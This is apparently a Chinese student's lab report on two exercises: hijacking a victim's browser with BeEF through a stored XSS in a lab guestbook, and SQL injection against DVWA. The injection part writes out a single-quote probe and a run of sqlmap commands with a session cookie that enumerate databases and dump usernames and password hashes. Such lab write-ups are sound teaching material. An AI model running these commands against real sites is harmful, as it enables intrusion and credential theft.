亞洲第一小鮮肉的第三次實驗: XSS和SQL隱碼攻擊
前言
記錄我的第三次實驗
一、XSS部分:利用Beef劫持被攻擊者客戶端瀏覽器。
實驗環境搭建。
角色:留言簿網站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻擊者:Kali(使用beEF生成惡意程式碼,並通過留言方式提交到留言簿網站);
被攻擊者:訪問留言簿網站,瀏覽器被劫持。
1、利用AWVS掃描留言簿網站,發現其存在XSS漏洞
先將windows 2003 server網路介面卡改成NAT模式,並修改網站分配的IP地址(該IP地址為win2003的IP地址)以確保該網站能被外部連結
之後複製網址並貼上進AWVS之中進行掃描
紅圈即為要被掃描的網站,黑圈是掃描出來的漏洞
2、 Kali使用beef生成惡意程式碼
從終端開啟beef-xss(註冊改密碼省略不講,看的懂英文都會弄),就會看到HOOK程式碼,《IP》處為beef所處電腦的IP
3、訪問http://留言簿網站/message.asp;將以下惡意程式碼寫入網站留言板
如圖所示:
4、只要客戶端訪問這個伺服器的留言板,客戶端瀏覽器就會被劫持,指定被劫持網站為學校主頁
登入beef網站(網址可在下圖找到)
可以在上圖看到主機已被劫持(首先需要管理員稽核通過你的留言)
之後進行以下六步操作
在第五步時修改網址,便可達到實驗目的
如圖:
5、回答問題:實驗中XSS攻擊屬於哪種型別?
注入型XSS攻擊
二、SQL隱碼攻擊部分:DVWA+SQLmap+Mysql注入實戰
1、注入點發現。
首先肯定是要判斷是否有注入漏洞。 在輸入框輸入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次輸入1',報錯,返回 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 此時可以斷定有SQL隱碼攻擊漏洞, http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit# 下面利用SQLMap進行注入攻擊。將DVWA安全級別設定為最低;在進行如下操作之前,首先要獲取cookie值
在介面按下F12,並按照圖下步驟便可
2、列舉當前使用的資料庫名稱和使用者名稱
sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’ -b --current-db --current-user
(由於不可抗力被攔下來了,導致下面的實驗麼得繼續進行,不好意思哈哈哈)
3、列舉資料庫使用者名稱和密碼
sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’ --users --password
4、列舉資料庫
sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’ --dbs
5、列舉資料庫和指定資料庫的資料表
sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’–string=“Surname” -D dvwa -T users --columns
6、獲取指定資料庫和表中所有列的資訊
sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’–string=“Surname” -D dvwa -T users --columns
7、列舉指定資料表中的所有使用者名稱與密碼,並down到本地。
sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’–string=“Surname” -D dvwa -T users -C user,password --dump
相關文章
- XSS與SQL隱碼攻擊SQL
- 網路滲透測試實驗三——XSS和SQL隱碼攻擊SQL
- 網路滲透測試實驗三-XSS和SQL隱碼攻擊SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-驗證檢查SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊SQL
- 讓你徹底瞭解SQL隱碼攻擊、XSS和CSRFSQL
- 在Linux中,如何檢測和防止SQL隱碼攻擊和跨站指令碼(XSS)攻擊?LinuxSQL指令碼
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句注入SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-語句修改SQL
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-繫結變數SQL變數
- SQL隱碼攻擊:Sqlmap初體驗SQL
- SQL隱碼攻擊SQL
- 亞洲第一小鮮肉的第二次實驗:網路嗅探與身份認證
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-防衛SQL隱碼攻擊-顯式格式化模型SQL模型
- 反恐精英之動態SQL和SQL隱碼攻擊-SQL隱碼攻擊-SQL隱碼攻擊技術-資料型別轉換SQL資料型別
- SQL隱碼攻擊的例子SQL
- 【SQL Server】--SQL隱碼攻擊SQLServer
- MYSQL SQL隱碼攻擊MySql
- 【SQL隱碼攻擊原理】SQL
- 防止SQL隱碼攻擊SQL
- SQL隱碼攻擊(一)SQL
- SQL隱碼攻擊(pikachu)SQL
- SQL隱碼攻擊方法SQL
- SQL隱碼攻擊原理是什麼?如何防範SQL隱碼攻擊?SQL
- SQL隱碼攻擊式攻擊掃描器SQL
- 【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!SQL
- SQL隱碼攻擊語句SQL
- pikachu-SQL隱碼攻擊SQL
- SQL隱碼攻擊導圖SQL
- SQL隱碼攻擊問題SQL
- ZMLCMS-SQL隱碼攻擊SQL
- SQL隱碼攻擊演練SQL
- 預防SQL隱碼攻擊SQL
- SQL隱碼攻擊總結SQL
- DVWA-SQL Injection(SQL隱碼攻擊)SQL
- 攻擊JavaWeb應用[3]-SQL隱碼攻擊[1]JavaWebSQL
- 攻擊JavaWeb應用[4]-SQL隱碼攻擊[2]JavaWebSQL
- 刪除SQL隱碼攻擊的程式碼SQL